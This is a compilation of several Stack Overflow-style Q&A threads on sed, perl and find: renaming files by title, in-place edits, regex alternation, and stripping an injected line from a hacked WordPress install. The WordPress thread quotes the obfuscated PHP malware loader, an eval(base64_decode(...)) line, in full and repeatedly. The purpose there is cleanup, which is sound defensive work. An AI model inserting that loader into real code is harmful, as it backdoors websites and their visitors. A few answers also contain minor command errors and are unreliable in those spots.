I'm trying to batch rename text files according to a string they contain.
I used sed to isolate the pattern with \( and \) as I couldn't get this to work in grep.
sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt | mv *.txt $sed.txt
(The text I want to use as the filename is between the HTML title tags.)
Where I wrote $sed, I want the output of sed to be used.
Hope that's clear!
A simple loop in bash can accomplish this. If each file is valid HTML, meaning you have only one <title> tag in the file, you can rename them all this way:
for file in *.txt; do
mv "$file" "$(sed -n 's/<title>\([^<]*\)<\/title>/\1/p;' "$file" | sed -e 's/[ ][ ]*/_/g').txt"
done
So, if you have files 1.txt, 2.txt and 3.txt, containing cat, dog and my hippo respectively in their <title> tags, you'll end up with cat.txt, dog.txt and my_hippo.txt after the above loop.
EDIT: quoted initial $file in case there are spaces in filenames; and added a second sed to convert any spaces in the <title> tag to _'s in resulting filenames. NOTE the whitespace inside the []'s in the second sed command is a literal space and tab character.
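A slightly more defensive variant of the loop above, as a minimal sketch rather than a definitive implementation. The function name rename_by_title is made up for illustration, and it assumes the opening and closing title tags sit on one line and that mv supports -n (GNU and BSD mv do). Files without a title are skipped instead of being renamed to ".txt".

```shell
# rename_by_title DIR  (hypothetical helper name)
# Rename every DIR/*.txt after the text of the first <title>...</title>
# that appears on a single line.
rename_by_title() (
    dir=${1:-.}
    for file in "$dir"/*.txt; do
        [ -f "$file" ] || continue    # the glob matched nothing
        # Keep the first title only; runs of spaces, tabs and slashes become "_".
        title=$(sed -n 's/.*<title>\([^<]*\)<\/title>.*/\1/p' "$file" |
                head -n 1 | tr -s ' \t/' '_')
        if [ -z "$title" ]; then
            echo "skipped (no title): $file" >&2
            continue
        fi
        mv -n -- "$file" "$dir/$title.txt"    # -n: do not overwrite an existing file
    done
)
```

Call it as rename_by_title . from the directory that holds the files.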
You can enclose a command in grave accent characters (`) to have the shell substitute its output at that position. Try:
mv *.txt `sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt`.txt
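It is not very flexible, and as written it needs adjusting: sed -i edits the files in place and prints nothing, and mv with several source files expects a directory as its last argument, so apply the idea to one file at a time.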
(I haven't used it in a while and cannot test it now, so I might be wrong).
Here is the command I would use:
for i in *.txt ; do
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
done
The sed substitution searches for the pattern in each of your .txt files. For each file, it builds the string mv 'file_name' 'found_pattern'.
With the e flag at the end of the s command (a GNU sed extension), the resulting string is executed as a shell command, which renames your files.
Some hints:
Note the use of =s instead of /s as delimiters for the sed substitution: it's more readable as you already have /s in your pattern (you could use many other symbols if you don't like =). This way you don't have to escape the / in your pattern.
The e command for sed executes the created string.
(I'm speaking of this one below:
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
                                          ^
)
So use it with caution! I would recommend first running the line without the final e: it won't execute any mv command, but will just print what would be executed if you added the e.
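The dry run suggested above can be sketched as a small function. The name preview_renames is hypothetical, and the sketch assumes file names and titles contain no =, &, backslash or single quote, since those would break the generated command. It only prints the mv commands and never runs them.

```shell
# preview_renames DIR  (hypothetical helper name)
# Print, without executing, the mv command that the e flag would run
# for each DIR/*.txt containing a <title>...</title> on one line.
preview_renames() (
    for i in "${1:-.}"/*.txt; do
        [ -f "$i" ] || continue    # the glob matched nothing
        # -n plus the p flag prints only lines where the substitution happened.
        sed -n "s=.*<title>\(.*\)</title>.*=mv '$i' '\1'=p" "$i"
    done
)
```

Review the printed commands first; only once they look right is it worth switching to the e flag or piping them to a shell.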
What I read from your question is:
you have a number of text (html) files in a directory
each file contains at least the tag <title> ... </title>
you want to extract the content (elements.text) and use it as filename
last you want to rename that file to the extracted filename
Is this correct?
So, then you need to loop through the files, e.g. with xargs or find
ls *.txt | xargs -i\{\} command "{}" ...
find -maxdepth 1 -type f -name '*.txt' -exec command "{}" ... \;
I always write the xargs placeholder as -i\{\} because the resulting command then stays compatible with find and its {} placeholder if I later switch between the two.
The -maxdepth option keeps find from descending into subdirectories; if there are none, you can leave it out.
command could be something very simple like echo "Testing File: {}" or a really small script if you use it with bash:
find . -name '*.txt' -exec bash -c 'CUR_FILE="{}"; echo "Working on: $CUR_FILE"; ls -l "$CUR_FILE";' \;
The big decision for your question is: how to get the text from title element.
A simple solution (suitable if the opening and closing tags are on the same line) is to use grep
A more robust solution is to use an HTML parser and navigate the DOM
The simple solution is based on these steps:
get the title line
remove everything before and after the title content
So do it together:
ls *.txt | xargs -i\{\} bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"'
Same with usage of find:
find . -maxdepth 1 -type f -name '*.txt' -exec bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"' \;
Hopefully it is what you expected.
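One caveat with the commands above: embedding {} inside the bash -c string lets a file name containing quotes or $ be interpreted as shell code. A minimal sketch of the same idea that passes the names as positional arguments instead is shown here; the function name rename_with_find is made up, and -maxdepth is assumed to be available (GNU and BSD find have it).

```shell
# rename_with_find DIR  (hypothetical helper name)
# Same extraction as above, but file names reach the inner shell as
# arguments ("$f"), never as part of the script text.
rename_with_find() {
    find "${1:-.}" -maxdepth 1 -type f -name '*.txt' -exec sh -c '
        for f do
            title=$(sed -n "s#.*<title>\([^<]*\)</title>.*#\1#p" "$f" | head -n 1)
            if [ -n "$title" ]; then
                mv -- "$f" "$(dirname "$f")/$title.txt"
            fi
        done
    ' sh {} +
}
```

Files without a title on a single line are left untouched.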
I'm trying to pipe the output of a find command to a perl one-liner to replace a line that ends with ?> with RedefineForDocker::standardizeXmlmc() but for some reason the value isn't being replaced. I've checked the output of the find command and it is performing as expected, and I've double checked my regex and it should match.
find . -name *.php -exec ggrep -Ezl 'class XmlMethodCall.*([?]>)$' {} \; \
| xargs perl -ewpn -i.bak2 \
"s/[?]>\s*?$/RedefineForDocker::standardizeXmlmc()\n/gm"
I get no warnings and no indication that it isn't working, the backups are created, but the file remains unchanged. The list of matched files run from the find command is below.
./swsupport/clisupp/trending/services/data.helpers.php
./swsupport/clisupp/_bpmui/arch/service/data.helpers.php
./swsupport/clisupp/_bpmui/itsm/service/data.helpers.php
./swsupport/clisupp/_bpmui/itsm_default/service/data.helpers.php
./webclient_code/php/session.php
./webclient_code/service/storedquery/helpers.php
./php/_phpinclude/itsm/xmlmc/xmlmc.php
./php/_phpinclude/itsmf/xmlmc/xmlmc.php
./php/_phpinclude/itsm_default/xmlmc/xmlmc.php
Here is an example of one of the files it should match
https://regex101.com/r/BUoCif/1
Run your perl command like this:
perl -i.bak2 -wpe 's/\?>\h*$/RedefineForDocker::standardizeXmlmc()\n/gm'
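The order of the command-line options matters here: -e must come last in a group of clustered options, because whatever follows it is taken as the program text. In -ewpn, perl sees wpn as the code to run.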
Full pipeline should be like this:
find . -name '*.php' -exec ggrep -PZzl '(?ms)class XmlMethodCall.*\?>\h*$' {} + |
xargs -0 perl -i.bak2 -wpe 's/\?>\h*$/RedefineForDocker::standardizeXmlmc()\n/gm'
Note the use of the -Z option in grep and the -0 option in xargs to handle filenames containing whitespace and similar characters.
Consider the following bash script with a simple regular expression:
for f in "$FILES"
do
echo $f
sed -i '/HTTP|RT/d' $f
done
This script should read every file in the directory specified by FILES and remove the lines containing 'HTTP' or 'RT'. However, it seems that the OR part of the regular expression is not working. That is, if I just use sed -i '/HTTP/d' $f, it removes all lines containing HTTP, but I cannot get it to remove lines containing either HTTP or RT.
What must I change in my regular expression so that lines with HTTP or RT are removed?
Thanks in advance!
Two ways of doing it (at least):
Have sed treat the pattern as an extended regex, where | means alternation:
sed -E -i '/HTTP|RT/d' $f
Specifying each token separately:
sed -i '/HTTP/d;/RT/d' $f
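The difference between the two regex flavours can be seen on a few sample lines without touching any file. This is a small sketch; the sample text and the helper name sample_lines are invented for illustration.

```shell
# Three made-up input lines: two to delete, one to keep.
sample_lines() {
    printf '%s\n' 'GET /index.html HTTP/1.1' 'RT @someone: hello' 'keep this line'
}

# Basic regex: "|" is an ordinary character, so no line matches and nothing is deleted.
sample_lines | sed '/HTTP|RT/d'

# Extended regex (-E): "|" is alternation, so both unwanted lines are deleted.
sample_lines | sed -E '/HTTP|RT/d'

# Two separate delete commands give the same result in either flavour.
sample_lines | sed -e '/HTTP/d' -e '/RT/d'
```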
Before you do anything, run with the opposite, and PRINT what you plan to DELETE:
sed -n -e '/HTTP/p' -e '/RT/p' $f
Just to be sure you are deleting only what you want to delete before actually changing the files.
"It's not a question of whether you are paranoid or not, but whether you are paranoid ENOUGH."
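Well, first of all, the loop iterates over the contents of the FILES variable itself (and, because "$FILES" is quoted, as a single word), not over the files in that directory.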
If you want it to do all files in the FILES directory, then you need something like this:
for f in $( find $FILES -maxdepth 1 -type f )
do
echo $f
sed -i -e '/HTTP/d' -e '/RT/d' $f
done
You just need two "-e" options to sed.
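Looping over the output of find with $( ... ) splits names on whitespace. A glob avoids that; the following is a minimal sketch, with the function name clean_dir made up here. It writes through a temporary file instead of using sed -i, since the -i syntax differs between GNU and BSD sed.

```shell
# clean_dir DIR  (hypothetical helper name)
# Delete lines containing HTTP or RT from every regular file directly in DIR.
clean_dir() (
    for f in "${1:?directory required}"/*; do
        [ -f "$f" ] || continue    # skip subdirectories and an unmatched glob
        # Write the filtered copy first, then replace the original only on success.
        sed -E '/HTTP|RT/d' "$f" > "$f.tmp" && mv -- "$f.tmp" "$f"
    done
)
```

Usage would be clean_dir "$FILES", with FILES holding the directory path.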
Is there a good regex to find all of the files that do not contain a certain character? I know there are lots to find lines containing matches, but I want something that will find all files that do not contain my match.
Using ls and sed to replace all filenames with no extension (i.e. not containing a .) with NoExtension:
ls | sed -e 's/^[^.]*$/NoExtension/g'
replacing filenames that have an extension with their extension:
ls | sed -e 's/^[^.]*$/NoExtension/g' -e 's/.*\.\(.*\)/\1/'
In bash, to list all files in a directory whose names contain no dot:
shopt -s extglob
ls !(*.*)
The extglob setting is required to enable the !(...) pattern, which negates the *.* glob passed to ls.
You should discard all the answers that parse the output of ls, because that breaks on file names containing newlines or other unusual characters. The find tool is perfect for this.
# Show files in cwd
$ ls
file file.txt
# Find the files with an extension
$ find -type f -regex '.*/.*\..*$'
./file.txt
# Invert the match using the -not option
$ find -type f -not -regex '.*/.*\..*$'
./file
And an awk solution, for good measure.
ls | awk '$0 !~ /\..+$/{a++}END{print a}'
This might work for you (find, GNU sed & wc):
find . -type f | sed -rn '\|.*/\.?[^.]+$|w NoExtensions' && wc -l NoExtensions
This gives you a count and a list.
N.B. dot files without extensions are included.
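A portable alternative that avoids both ls and -regex is a negated -name test, which only looks at the last path component. This is a small sketch; the function name list_no_ext is made up. Unlike the sed version above, dot files such as .profile are not listed, because their names contain a dot.

```shell
# list_no_ext DIR  (hypothetical helper name)
# List regular files under DIR whose own name contains no dot.
# Dots in parent directory names do not matter, since -name tests the basename only.
list_no_ext() {
    find "${1:-.}" -type f ! -name '*.*'
}
```

Appending | wc -l to the call gives the count instead of the list.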
I've got a hacked wordpress install I'd like to clean up. Every single .php file has had this inserted at the top:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
I'd like to replace that string with nothing in every .php file in the wordpress directory including subs. What's my best option? I've got bash, python, perl, php and so on.
I've tried:
perl -pi -e 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
Bareword found where operator expected at -e line 1, near "s/<?php\ /**/eval"
syntax error at -e line 1, near "s/<?php\ /**/eval"
Identifier too long at -e line 1.
and
sed -i 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
sed: -e expression #1, char 15: unknown option to `s'
#!/usr/bin/perl
use warnings;
use strict;
use File::Find;
# get a list of files
local @ARGV;
find sub {push @ARGV, $File::Find::name if /\.php$/}, '.';
# do in-place editing
$^I = '.bak';
while (<>) {
print unless $_ eq "<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>\n";
}
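The Perl script above compares whole lines literally, which sidesteps regex escaping altogether. The same idea can be sketched in shell with grep's fixed-string mode. The function name strip_exact_line is hypothetical, and the sketch assumes the injected code occupies a line of its own.

```shell
# strip_exact_line NEEDLE FILE...  (hypothetical helper name)
# Remove every line that is exactly equal to NEEDLE from each FILE.
strip_exact_line() (
    needle=$1
    shift
    for f do
        # -F: literal string, -x: whole line must match, -v: keep the other lines.
        # grep exits 1 when it prints nothing, which is fine; 2 or more is a real error.
        grep -vxF -e "$needle" "$f" > "$f.clean" || [ $? -eq 1 ] || {
            rm -f "$f.clean"
            continue
        }
        mv -- "$f.clean" "$f"
    done
)
```

The first argument would be the full injected line, quoted so that the shell passes it through unchanged.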
Note that your string already contains the '/' character, which is the default regex delimiter that you are using in both your perl and sed commands.
You can either escape each one as '\/' or use a different character as the regex delimiter. For sed, try
sed -i 's#<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>##g' *.php
For some seds, you have to 'tell' sed that you are changing the delimiter. Only the initial reg-exp delimiter needs an escape char, i.e. sed -k 's\#<....##g' *.php
I hope this helps.
P.S. as you appear to be a new user, if you get an answer that helps you please remember to mark it as accepted, and/or give it a + (or -) as a useful answer.
The problem is that '/' exists in the string you want to match, and you are using '/' as your pattern delimiter. Luckily, Perl allows you to specify alternate delimiters, so use one that is not in the string you are matching:
perl -pn -i.bak -e "s{<?php\ /\*\*/eval\(base64_decode\('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\)\);\ \?>}{}g;" `find . -name '*.php'`
I modified the command a bit. It is always good practice to create backup files when doing in-place edits in case there is an error or you need to verify (via diff) that the command did what you expect (I have a perl program that allows me to easily rename the .bak files back in case I need to reset things).
I also use a find command to get the list of all .php files in and below the current directory. If working in a flat directory, your *.php is sufficient.
You also need to escape the regex special characters in the string you want to match. For example, the '*', '?', '(' and ')' characters need to be escaped.
If the command works as expected, you can run the following command to remove the .bak files:
/bin/rm `find . -name '*.bak'`
find ./*php | xargs -t -i perl -pi -e "s/<\?php\s+\/\*\*\/eval\(base64_decode\(\'\S+\'\)\);\s+\?>//;" {}
Feel free to substitute the ginormous base64 string instead of \S+
Try this:
sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//' *.php
Things I changed:
escaped all regexp symbols in your code (e.g. (, ), * and ?)
replaced ' with '\'' in your code, which is the only way to put a ' in a '-delimited string in bash
If you want to recursively replace *.php even in subdirectories of this directory:
find . -name '*.php' -print0 | xargs -0 sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//'
Note that I've used -print0 and -0 so it doesn't break with files with spaces.
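The '\'' idiom mentioned above is easier to see on a short string. In this sketch the base64 payload is replaced by the invented placeholder QUJD: each '\'' closes the single-quoted string, adds one escaped quote, and reopens the string.

```shell
# Placeholder payload (QUJD) stands in for the long base64 string.
pattern='base64_decode\('\''QUJD'\''\)'

# Print what sed would actually receive as its pattern.
printf '%s\n' "$pattern"
```

The printed pattern contains the two single quotes literally, which is what the regex needs in order to match the PHP source.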
Here's a bash 4+ script
#!/bin/bash
shopt -s globstar
shopt -s nullglob
for php in **/*.php
do
data=$(<"$php")
a=${data%%<?php*}
echo "$a ${data#*?>}" > t && mv t "$php"
done
I have nested subdirectories containing html files. For each of these html files I want to delete from the top of the file until the pattern <div id="left-
This is my attempt from osx's terminal:
find . -name "*.html" -exec sed "s/.*?<div id=\"left-col/<div id=\"left-col/g" '{}' \;
I get a lot of HTML output in the terminal, but no files contain the substitution or are written.
There are two problems with your command. The first problem is that you aren't selecting an output location for sed. The second is that your sed script is not doing what you want it to do: the script you posted will look at each line and delete everything ON THAT LINE before the <div>. Lines without the <div> will be unaffected. You may want to try:
find . -name "*.html" -exec sed -i.BAK -n "/<div id=\"left-col/,$ p" {} \;
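This will also automatically back up your files by appending .BAK to the original names. If this is undesirable, change -i.BAK to -i '' (the sed shipped with OS X requires the suffix argument, even when it is empty; GNU sed accepts a bare -i).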
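Where the -i differences between sed versions are a concern, the same range print can go through a temporary file. This is a sketch only: the function name trim_to_marker is made up, and the marker is taken from the attempt in the question. Files that do not contain the marker are left alone, since the range would otherwise print nothing and empty them.

```shell
# trim_to_marker FILE...  (hypothetical helper name)
# Keep each FILE from the first line containing the marker through the end.
trim_to_marker() (
    marker='<div id="left-col'
    for f do
        grep -q -- "$marker" "$f" || continue    # no marker: leave the file untouched
        # Print from the first matching line to the last line ($), then swap the file in.
        sed -n "/$marker/,\$p" "$f" > "$f.tmp" && mv -- "$f.tmp" "$f"
    done
)
```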
You're outputting the result of the sed regex to stdout, the console, when you want to be writing it to the file.
To edit the files in place with sed, use the -i flag (on OS X, -i takes a backup suffix, which may be empty). Note that sed has no non-greedy .*? quantifier, so the ? is dropped here:
find . -name "*.html" -exec sed -i '' "s/.*<div id=\"left-col/<div id=\"left-col/g" '{}' \;
Make sure you back up your files before running this command, if possible. Otherwise you risk data loss from a mistyped regex.
You're not storing the output of sed anywhere; that's why it's spitting out the html.